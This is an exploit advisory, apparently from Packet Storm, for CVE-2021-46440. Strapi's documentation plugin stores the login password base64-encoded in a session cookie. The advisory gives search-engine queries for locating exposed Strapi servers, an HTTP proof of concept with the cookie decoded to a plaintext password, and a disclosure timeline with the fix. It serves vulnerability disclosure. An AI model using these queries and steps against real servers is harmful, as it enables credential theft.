Strapi 3.6.8 Password Disclosure / Insecure Handling

Strap versions prior to 3.6.9 and 4.1.5 disclose a user's password due to simply base64 encoding it and sticking it in a cookie.


SHA-256 | 069e678d219ce2bfcd777e3fcf09ee5a7c59fe5b6c563e15e918fd0877c7aff7

Download
# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format
# Google Dork: intitle:"Welcome to your Strapi ap"
# Shodan search: "X-Powered-By: Strapi <strapi.io>"
# Date: 2022-03-30
# Exploit Author: Kitchaphan Singchai [idealphase]
# Vendor Homepage: https://strapi.io/
# Software Link: https://github.com/strapi/strapi/releases
# Vulnerable Version: < 3.6.9 and < 4.1.5
# Version: 3.6.8
# Tested on: Linux
# CVE: CVE-2021-46440

# Description:
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.

# This CVE has been fixed via this Github pull request.
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)

# PoC:
[Request]
POST /documentation/login HTTP/1.1
Host: 127.0.0.1:1337
..[SNIP]..

password=password

[Response]
HTTP/1.1 302 Found
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly
X-Powered-By: Strapi <strapi.io>
..[SNIP]..

Redirecting to <a href="/documentation">/documentation</a>.

Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}

# Timeline:
19/Jan/2022 - Inform vulnerability to Strapi team
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
28/Mar/2022 - Reserved CVE-2021-46440
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]

Source: packetstormsecurity.com
Related Posts